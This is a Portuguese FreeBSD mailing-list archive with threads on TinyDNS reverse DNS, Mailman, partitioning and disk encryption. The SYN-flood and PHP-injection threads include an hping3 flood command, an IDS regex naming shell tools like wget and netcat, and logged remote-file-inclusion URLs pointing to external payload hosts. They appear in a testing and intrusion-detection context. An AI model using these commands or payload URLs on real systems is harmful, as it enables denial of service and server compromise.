Voce já ligou pra Embratel, solicitou o dns slave e falou prá eles que o IP que a zona será transferida é o associado ao nome ns.grupoheringer.com.br? Depois, você já permitou que o DNS slave da embratel(que na verdade vai ser o autoritativo, prá internet a fora), transfira a zona de você? Não esqueça que o tiny não permite transferência de zona, igual o named. Você tem que instalar o axfrdns para permitir que o IP da Embratel(200.255.125.214) transfira a zona 168-175.221.65.201.in-addr.arpa Depois disto feito você tem que ligar de novo lá e pedir que façam o teste de transferência, tudo estando OK em até 48h, após o refresh o reverso fica OK :) -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Fabiano (BiGu) Enviada em: sexta-feira, 22 de fevereiro de 2008 15:27 Para: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) Assunto: Re: [FUG-BR] RES: Configuracao de DNS Reverso no TinyDNS pois eh, o meu ta assim: .grupoheringer.com.br:201.65.221.171:a .grupoheringer.com.br:201.65.221.172:b .168-175.221.65.201.in- addr.arpa:201.65.221.171:a.ns.grupoheringer.com.br .168-175.221.65.201.in- addr.arpa:201.65.221.172:b.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa::ns.embratel.net.br ^171.168-175.221.65.201.in-addr.arpa:a.ns.grupoheringer.com.br ^172.168-175.221.65.201.in-addr.arpa:b.ns.grupoheringer.com.br sendo que o bloco é 201.65.221.168/29 ja chequei num site que testa reverso e nada...existe algum tempo pra ele ser publicado ou isso eh instantaneo? Abracos Renato Frederick escreveu: Aqui faço assim: ##REVERSO EMBRATEL 0-63 .0-63.3.2.200.in-addr.arpa:200.2.3.X:a .0-63.3.2.200.in-addr.arpa:200.2.3.X:b ^1.0-63.3.2.200.in-addr.arpa:server1.dominio.com.br ^2.0-63.3.2.200.in-addr.arpa:server2.dominio.com.br Neste caso, é o reverso pra zona 200.2.3.0/26 (0 à 63). -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Fabiano (BiGu) Enviada em: sexta-feira, 22 de fevereiro de 2008 13:04 Para: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) Assunto: [FUG-BR] Configuracao de DNS Reverso no TinyDNS Pessoal, andei dando uma lida na configuracao do tinydns, na verdade, ele esta funcionando legal aqui, o problema nao estou conseguindo configurar o dns reverso para meu bloco, tenho um servidor de email nesses ips, entao preciso do dns reverso..alguem pode me dar um help? dei uma lida na documentacao, mas fiquei confuso! Meu bloco de Ip é 201.65.221.168/29, na verdade existia um arquivo aqui com final .in-addr.arpa, mas deu um problema aqui e perdi esse arquivo, e nao sei qual o conteudo dele!!! se alguem puder me ajudar!! Abaixo o meu config do tinydns: # ## GRUPO HERINGER # # Recebe autoridade no dominio grupoheringer.com.br .grupoheringer.com.br:201.65.221.171:a .grupoheringer.com.br:201.65.221.172:b .168-175.221.65.201.in- addr.arpa:201.65.221.171:a.ns.grupoheringer.com.br .168-175.221.65.201.in- addr.arpa:201.65.221.172:b.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa::ns.embratel.net.br ^171.168-175.221.65.201.in-addr.arpa:a.ns.grupoheringer.com.br ^172.168-175.221.65.201.in-addr.arpa:b.ns.grupoheringer.com.br ^170.221.65.201.in-addr.arpa:gateway.grupoheringer.com.br ^171.221.65.201.in-addr.arpa:servidor.grupoheringer.com.br ^172.221.65.201.in-addr.arpa:asterisk.grupoheringer.com.br # A, CNAME, Alias, PTR, MX =gateway.grupoheringer.com.br:201.65.221.170 =asterisk.grupoheringer.com.br:201.65.221.172 =a.ns.grupoheringer.com.br:201.65.221.171 =b.ns.grupoheringer.com.br:201.65.221.172 +grupoheringer.com.br:201.65.221.170 +www.grupoheringer.com.br:201.65.221.171 +mail.grupoheringer.com.br:201.65.221.172 +ftp.grupoheringer.com.br:201.65.221.171 +webmail.grupoheringer.com.br:201.65.221.172 +painel.grupoheringer.com.br:201.65.221.172 @grupoheringer.com.br::asterisk.grupoheringer.com.br:10 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd smime.p7s Description: S/MIME cryptographic signature - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] RES: Configuracao de DNS Reverso no TinyDNS
Citando Fabiano (BiGu): pois eh, o meu ta assim: .grupoheringer.com.br:201.65.221.171:a .grupoheringer.com.br:201.65.221.172:b .168-175.221.65.201.in-addr.arpa:201.65.221.171:a.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa:201.65.221.172:b.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa::ns.embratel.net.br ^171.168-175.221.65.201.in-addr.arpa:a.ns.grupoheringer.com.br ^172.168-175.221.65.201.in-addr.arpa:b.ns.grupoheringer.com.br sendo que o bloco é 201.65.221.168/29 ja chequei num site que testa reverso e nada...existe algum tempo pra ele ser publicado ou isso eh instantaneo? Abracos Renato Frederick escreveu: Aqui faço assim: ##REVERSO EMBRATEL 0-63 .0-63.3.2.200.in-addr.arpa:200.2.3.X:a .0-63.3.2.200.in-addr.arpa:200.2.3.X:b ^1.0-63.3.2.200.in-addr.arpa:server1.dominio.com.br ^2.0-63.3.2.200.in-addr.arpa:server2.dominio.com.br Neste caso, é o reverso pra zona 200.2.3.0/26 (0 à 63). -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Fabiano (BiGu) Enviada em: sexta-feira, 22 de fevereiro de 2008 13:04 Para: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) Assunto: [FUG-BR] Configuracao de DNS Reverso no TinyDNS Pessoal, andei dando uma lida na configuracao do tinydns, na verdade, ele esta funcionando legal aqui, o problema nao estou conseguindo configurar o dns reverso para meu bloco, tenho um servidor de email nesses ips, entao preciso do dns reverso..alguem pode me dar um help? dei uma lida na documentacao, mas fiquei confuso! Meu bloco de Ip é 201.65.221.168/29, na verdade existia um arquivo aqui com final .in-addr.arpa, mas deu um problema aqui e perdi esse arquivo, e nao sei qual o conteudo dele!!! se alguem puder me ajudar!! Abaixo o meu config do tinydns: # ## GRUPO HERINGER # # Recebe autoridade no dominio grupoheringer.com.br .grupoheringer.com.br:201.65.221.171:a .grupoheringer.com.br:201.65.221.172:b .168-175.221.65.201.in- addr.arpa:201.65.221.171:a.ns.grupoheringer.com.br .168-175.221.65.201.in- addr.arpa:201.65.221.172:b.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa::ns.embratel.net.br ^171.168-175.221.65.201.in-addr.arpa:a.ns.grupoheringer.com.br ^172.168-175.221.65.201.in-addr.arpa:b.ns.grupoheringer.com.br ^170.221.65.201.in-addr.arpa:gateway.grupoheringer.com.br ^171.221.65.201.in-addr.arpa:servidor.grupoheringer.com.br ^172.221.65.201.in-addr.arpa:asterisk.grupoheringer.com.br # A, CNAME, Alias, PTR, MX =gateway.grupoheringer.com.br:201.65.221.170 =asterisk.grupoheringer.com.br:201.65.221.172 =a.ns.grupoheringer.com.br:201.65.221.171 =b.ns.grupoheringer.com.br:201.65.221.172 +grupoheringer.com.br:201.65.221.170 +www.grupoheringer.com.br:201.65.221.171 +mail.grupoheringer.com.br:201.65.221.172 +ftp.grupoheringer.com.br:201.65.221.171 +webmail.grupoheringer.com.br:201.65.221.172 +painel.grupoheringer.com.br:201.65.221.172 @grupoheringer.com.br::asterisk.grupoheringer.com.br:10 ate onde sei, a consulta a essa zona reversa vai ser feita nos nameservers da tua operadora (que 'owna' a zona/rede). vc precisa solicitar que eles sejam seu name server slave pra esta zona (somente pra que vc nao dependa diretamente deles caso queira editar algo futuramente. nada impede ke eles nao sejam o slave). o tempo que vc vai ter de esperar é só o tempo pra propagar a zona, msmo. - Webmail SecrelNet - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Mailman
pessoal, é possivel instalar o mailman ou outro generico desses em um servidor e o mta está em outro ? obrigado - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Mailman
Fernando Silva escreveu: pessoal, é possivel instalar o mailman ou outro generico desses em um servidor e o mta está em outro ? Sim, e não. O mailman precisa do MTA localmente, mas isso nao quer dizer que o MTA local tenha q ser o que desempenhara as funcoes plenas. Ele pode estar apenas configurado como smarthost e enviar tudo pra um outro e receber o que tiver q receber desse outro. Enfim, é mais no nivel do MTA do que do mailman. obrigado - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Patrick Tracanelli FreeBSD Brasil LTDA. Tel.: (31) 3516-0800 [EMAIL PROTECTED] http://www.freebsdbrasil.com.br Long live Hanin Elias, Kim Deal! - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Tamanho das partições no bsd
Obrigado Gerson, Marcelo e Tholoko. Espero um dia poder ajudar outros tbm. Inté 2008/2/22 Gerson Oaida [EMAIL PROTECTED]: João, Eu uso da seguinte maneira. No caso da memoria ram de 1 Gb swap 150% memoria ram ou 1,5 Gb / 200 % memoria ram ou 2 Gb /var 10x emoria ram ou 10 Gb / usr resto o disco, pois é la que ficam a mair parte dos dados e programas. Se voce for usar o mysql postgre, plone etc.. etc... os dados são aramazenados em /var/... então voce pode aumentar o /var ou criar links simbolicos para outras areas de disco. Gerson joao jamaicabsd escreveu: Muito obrigado pela ajuda galera, será de muito valia, mas gostaria de saber tipo assim: / = 10% /boot = 5% /etc = 10% /usr = 30% . . . . Tem como vc´s me dar um auxilio para entender isso? O que seria seria melhor neste caso? Obrigado novamente 2008/2/21 Marcelo Soares da Costa [EMAIL PROTECTED]: Eu gosto de colocar a aplicação web e o banco de dados em outra partição primaria , slice, assim reinstalo o sistema sem alterar os dados do banco e deixo os script php lá sussegados e ainda a partição pode ser montada com noexec, nosuid etc e tal []'s Em Qui, 2008-02-21 às 13:30 -0300, ThOLOko escreveu: Cara, depende mto do seu uso. Caso gere muitos graficos, banco de dados, aconcelho que deixe um bom tamanho no /var. Abraços! Em 21/02/08, joao jamaicabsd[EMAIL PROTECTED] escreveu: Boa tarde a todos! Uma dúvida que vem me acompanhando a algum tempo. Para eu montar um server como BSD qual o tamanho mais aconselhável das particões /, /usr, /etc, etc, para um servidor que terá apache, mysql, php, samba, ftp, squid e sarg. Irei fazer estes testes em um hd de 20GB. Alguém pode me dar uma força? Obrigado a todos -- E-mail: [EMAIL PROTECTED] Aux Suporte de Sistemas (UNISUL) E-mail: [EMAIL PROTECTED] MSN: [EMAIL PROTECTED] Cel: (48) 9144 2326 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd === Aviso de confidencialidade: === Esta mensagem da Empresa Brasileira de Pesquisa Agropecuaria (Embrapa), empresa publica federal regida pelo disposto na Lei Federal N. 5.851,de 7 de dezembro de 1972, e enviada exclusivamente a seu destinatario e pode conter informacoes confidenciais, protegidas por sigilo profissional. Sua utilizacao desautorizada e ilegal e sujeita o infrator as penas da lei. Se voce a recebeu indevidamente, queira, por gentileza, reenvia-la ao emitente, esclarecendo o equivoco. = Confidentiality note: = This message from Empresa Brasileira de Pesquisa Agropecuaria (Embrapa) a government company established under Brazilian law (5.851/72) is directed exclusively to its addresses and may contain confidential data, protected under professional secrecy rules. Its unauthorized use is illegal and may subject the transgressor to the law's penalties. If you are not the addressee, please send it back, elucidating the failure. == Embrapa Florestas www.cnpf.embrapa.br [EMAIL PROTECTED] [EMAIL PROTECTED] - - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- E-mail: [EMAIL PROTECTED] Aux Suporte de Sistemas (UNISUL) E-mail: [EMAIL PROTECTED] MSN: [EMAIL PROTECTED] Cel: (48) 9144 2326 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] SYNFlood
Obrigado, testando. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] criptografia de partição montada no b oot
Ataques bem-sucedidos a partições criptografadas, usando leitura das chaves na RAM após desligar e religar o micro http://br-linux.org/2008/ataques-bem-sucedidos-a-particoes-criptografadas-usando-leitura-das-chaves-na-ram-apos-desligar-e-religar-o-micro/ Curioso -- -=-=-=-=-=-=-=-=-=- William David Armstrong .Of course it runs Bio Systems Security Networking |== MSN / GT [EMAIL PROTECTED] ' OpenBSD or FreeBSD -- - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] RES: RES: Configuracao de DNS Reverso no TinyDNS
sim sim, eu sei disso...so queria compartilhar com voces se a configuracao está correta, no axfrdns, configurei: :deny 200.255.125.214:allow,AXFR=grupoheringer.com.br/168-175.221.65.201.in-addr.arpa vou ligar la... Obrigado! Renato Frederick escreveu: Voce já ligou pra Embratel, solicitou o dns slave e falou prá eles que o IP que a zona será transferida é o associado ao nome ns.grupoheringer.com.br? Depois, você já permitou que o DNS slave da embratel(que na verdade vai ser o autoritativo, prá internet a fora), transfira a zona de você? Não esqueça que o tiny não permite transferência de zona, igual o named. Você tem que instalar o axfrdns para permitir que o IP da Embratel(200.255.125.214) transfira a zona 168-175.221.65.201.in-addr.arpa Depois disto feito você tem que ligar de novo lá e pedir que façam o teste de transferência, tudo estando OK em até 48h, após o refresh o reverso fica OK :) -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Fabiano (BiGu) Enviada em: sexta-feira, 22 de fevereiro de 2008 15:27 Para: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) Assunto: Re: [FUG-BR] RES: Configuracao de DNS Reverso no TinyDNS pois eh, o meu ta assim: .grupoheringer.com.br:201.65.221.171:a .grupoheringer.com.br:201.65.221.172:b .168-175.221.65.201.in- addr.arpa:201.65.221.171:a.ns.grupoheringer.com.br .168-175.221.65.201.in- addr.arpa:201.65.221.172:b.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa::ns.embratel.net.br ^171.168-175.221.65.201.in-addr.arpa:a.ns.grupoheringer.com.br ^172.168-175.221.65.201.in-addr.arpa:b.ns.grupoheringer.com.br sendo que o bloco é 201.65.221.168/29 ja chequei num site que testa reverso e nada...existe algum tempo pra ele ser publicado ou isso eh instantaneo? Abracos Renato Frederick escreveu: Aqui faço assim: ##REVERSO EMBRATEL 0-63 .0-63.3.2.200.in-addr.arpa:200.2.3.X:a .0-63.3.2.200.in-addr.arpa:200.2.3.X:b ^1.0-63.3.2.200.in-addr.arpa:server1.dominio.com.br ^2.0-63.3.2.200.in-addr.arpa:server2.dominio.com.br Neste caso, é o reverso pra zona 200.2.3.0/26 (0 à 63). -Mensagem original- De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome de Fabiano (BiGu) Enviada em: sexta-feira, 22 de fevereiro de 2008 13:04 Para: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) Assunto: [FUG-BR] Configuracao de DNS Reverso no TinyDNS Pessoal, andei dando uma lida na configuracao do tinydns, na verdade, ele esta funcionando legal aqui, o problema nao estou conseguindo configurar o dns reverso para meu bloco, tenho um servidor de email nesses ips, entao preciso do dns reverso..alguem pode me dar um help? dei uma lida na documentacao, mas fiquei confuso! Meu bloco de Ip é 201.65.221.168/29, na verdade existia um arquivo aqui com final .in-addr.arpa, mas deu um problema aqui e perdi esse arquivo, e nao sei qual o conteudo dele!!! se alguem puder me ajudar!! Abaixo o meu config do tinydns: # ## GRUPO HERINGER # # Recebe autoridade no dominio grupoheringer.com.br .grupoheringer.com.br:201.65.221.171:a .grupoheringer.com.br:201.65.221.172:b .168-175.221.65.201.in- addr.arpa:201.65.221.171:a.ns.grupoheringer.com.br .168-175.221.65.201.in- addr.arpa:201.65.221.172:b.ns.grupoheringer.com.br .168-175.221.65.201.in-addr.arpa::ns.embratel.net.br ^171.168-175.221.65.201.in-addr.arpa:a.ns.grupoheringer.com.br ^172.168-175.221.65.201.in-addr.arpa:b.ns.grupoheringer.com.br ^170.221.65.201.in-addr.arpa:gateway.grupoheringer.com.br ^171.221.65.201.in-addr.arpa:servidor.grupoheringer.com.br ^172.221.65.201.in-addr.arpa:asterisk.grupoheringer.com.br # A, CNAME, Alias, PTR, MX =gateway.grupoheringer.com.br:201.65.221.170 =asterisk.grupoheringer.com.br:201.65.221.172 =a.ns.grupoheringer.com.br:201.65.221.171 =b.ns.grupoheringer.com.br:201.65.221.172 +grupoheringer.com.br:201.65.221.170 +www.grupoheringer.com.br:201.65.221.171 +mail.grupoheringer.com.br:201.65.221.172 +ftp.grupoheringer.com.br:201.65.221.171 +webmail.grupoheringer.com.br:201.65.221.172 +painel.grupoheringer.com.br:201.65.221.172 @grupoheringer.com.br::asterisk.grupoheringer.com.br:10 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico:
Re: [FUG-BR] criptografia de partição montada no b oot
Alguém ai pensou em Petrobras? Lá sumiram exatamente os pentes de memória e hds... Só que há um porém, os laptops provavelmente foram violados muitas horas depois de terem sido desligados, ou será que não? É no mínimo estranho... 2008/2/22, William David FUG-BR [EMAIL PROTECTED]: Ataques bem-sucedidos a partições criptografadas, usando leitura das chaves na RAM após desligar e religar o micro http://br-linux.org/2008/ataques-bem-sucedidos-a-particoes-criptografadas-usando-leitura-das-chaves-na-ram-apos-desligar-e-religar-o-micro/ Curioso -- -=-=-=-=-=-=-=-=-=- William David Armstrong .Of course it runs Bio Systems Security Networking |== MSN / GT [EMAIL PROTECTED] ' OpenBSD or FreeBSD -- - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- /* * Klaus Schneider */ - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] SYNFlood
posta o resultado ai depois. 2008/2/22, Cabral [EMAIL PROTECTED]: Obrigado, testando. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Marcio Antunes Powered by FreeBSD == * Windows: Where do you want to go tomorrow? * Linux: Where do you want to go today? * FreeBSD: Are you, guys, comming or what? - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] SYNFlood
Então, fiz aqui, mas apareceu um pequeno problema, ele da erro depois de um certo tempo. root# hping3 --flood --rand-source --faster -p 3306 -S 192.168.1.9 HPING 192.168.1.9 (en0 192.168.1.9): S set, 40 headers + 0 data bytes hping in flood mode, no replies will be shown hping3(378) malloc: *** error for object 0x300c20: incorrect checksum for freed object - object was probably modified after being freed, break at szone_error to debug - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] OT-Ataque PHP injection
Boa tarde :) 2008/2/22 Patrick Tracanelli [EMAIL PROTECTED]: William Grzybowski escreveu: Oi Patrick, Buenos =) Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Opa, confere hehehe Como que funcionam essas regras que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Cara, um IDS atua na camada 7, portanto de aplicação, seja qual aplicação for. Pense então numa regra ridiculamente simples, que alerte: - qualquer fluxo de qualquer origem pra qualquer destino em portas HTTP conhecidas (80, 8080, 3128, etc) - que cumpra os requisitos acima e contenha no payload um GET (protocolo HTTP) com qualquer uma das expressoes: - qqcoisa.php?qqcoisa=(http|ftp) - qqcoisa.php?qqcoisaqqcoisa=(http|ftp) So a regra simplista acima daria match em coisas como seila.php?ver=http://sei.na.net/seila2.php.txt seila.php?ver=produtoscategoria=ftp://u:[EMAIL PROTECTED]/seila.txt Ou seja ja eh indicio pleno de injection. Adicione na verificacao se houver na URL (a partedo payload apos o GET na porta http) qualquer coisa entre: (\\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|cat|pagina|path|include_location|root|page|gorumDir|site|topside|pun_root|open|seite)=(http|https|ftp)\\:/|(cmd|command)=(cd|\\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\\+\\+ |\\./|whoami|killall |rm \\-[a-z|A-Z])) Ai ja nem eh mais indicio, é descaramento. Por exemplo, meu IPS acaba de pegar, nesse segundo, a seguinte tentativa: GET http://www.freebsdbrasil.com.br/home.php?area=http://www.bestlearning.co.kr/bbs/tool25.txt?cmd=id; E 10 segundos antes: Req: http://free.bsd.com.br GET //admin_users.php?phpbb_root_path=http://www.artsconnect.com.au/art/can? HTTP/1.1 405 345 (null) - libwww-perl/5.805 [EMAIL PROTECTED] Qual é mais discarado? hhehehe se voce entrar em http://www.bestlearning.co.kr/bbs/tool25.txt?cmd=id Ta la o codigo que, supostamente, deveria ser injetado no php da vitima (eu). A questão é, esses logs são de fluxo inbound, o que chega no meu IPS e vai pra dentro, mas se o fluxo fosse outbound eu pegaria exatamente a mesma coisa, pq o que passa no PAYLOAD é a mesma coisa, e é o que o IDS/IPS analisa. Então se alguem aqui, ou um servidor de cliente no Data Center for comprometido (ou o proprio cliente resolver brincar) e tentar realizar os probing partindo daqui de dentro os alertas gerados serao equivalentes. Espero ter ajudado :) Ajudou sim, ficou bem claro em como o IPS/IDS atuam :) obrigado. E realmente, seria a solução ideal para o problema ;D Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance ? ou somente as regras que posso usar no snort. Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, não importa se é uma multinacional, pagara como pequeno. No site da SourceFire tem todos os detalhes sobre preços. São só as regras a principio, mas pode comprar o sistema deles. Não conheço quem use no país o sistema deles. Mas não parece ser mais do que o Snort com um front-end muito amigável. No caso da Juniper tem direito automaticamente a versão convertida pra Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS (que é um add-on no firewall Juniper). No Brasil quem representa a venda das assinaturas Source Fire é a BRConnection. Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu: Cristina Fernandes Silva escreveu: Acho que não fui clara, Vou explicar, Quero evitar que alguem da minha rede use o meu ip (endereço ) para fazer ataques de php injection para outro endereço externo. Até mesmo os meus usuarios interno fazer algum ataque para servidores externos.. Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de satisfação vai depender da qualidade das regras de análise de instrusão que você utilizar. Isso quer dizer que dependendo do nível de seriedade da empresa será proveitoso assinar um serviço (comercial) que oferece regras testadas e atualizadas. Apesar da escolha natural ser Source Fire, minha escolha pessoal (e
Re: [FUG-BR] Geometry Error
2008/2/22 Danilo Bedani [EMAIL PROTECTED]: Adquiri um Dell PowerEdge T105, com hd Western Digital modelo WD2500YS. Estou instalando o FreeBSD 6.3 Amd64 nele, e qdo vou fazer os slices para particionar, ele me dá uma mensagem de erro dizendo que a geometria do hd está errada. Jah procurei informações sobre o hd que tenho, mas nada resolve, ele não consegue escrever no disco. Testei com Debian, e funcionou sem problemas Alguém tem alguma dica de como posso solucionar isso? Se usas o sysinstall e o FreeBSD será o único SO a rodar, experimenta a opção f na hora de particionar o disco. Isso te permite alocar o disco inteiro, sem ter uma tabela de partição de verdade. Maiores informações em http://www.freebsd.org/cgi/cvsweb.cgi/src/usr.sbin/sysinstall/help/slice.hlp?rev=1.8.14.2;content-type=text%2Fplain -- Carlos A. M. dos Santos - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Mailman
ok, vou me virar aki para fazer isso valeu pela dica. abraços On Fri, Feb 22, 2008 at 4:23 PM, Patrick Tracanelli [EMAIL PROTECTED] wrote: Fernando Silva escreveu: pessoal, é possivel instalar o mailman ou outro generico desses em um servidor e o mta está em outro ? Sim, e não. O mailman precisa do MTA localmente, mas isso nao quer dizer que o MTA local tenha q ser o que desempenhara as funcoes plenas. Ele pode estar apenas configurado como smarthost e enviar tudo pra um outro e receber o que tiver q receber desse outro. Enfim, é mais no nivel do MTA do que do mailman. obrigado - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Patrick Tracanelli FreeBSD Brasil LTDA. Tel.: (31) 3516-0800 [EMAIL PROTECTED] http://www.freebsdbrasil.com.br Long live Hanin Elias, Kim Deal! - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd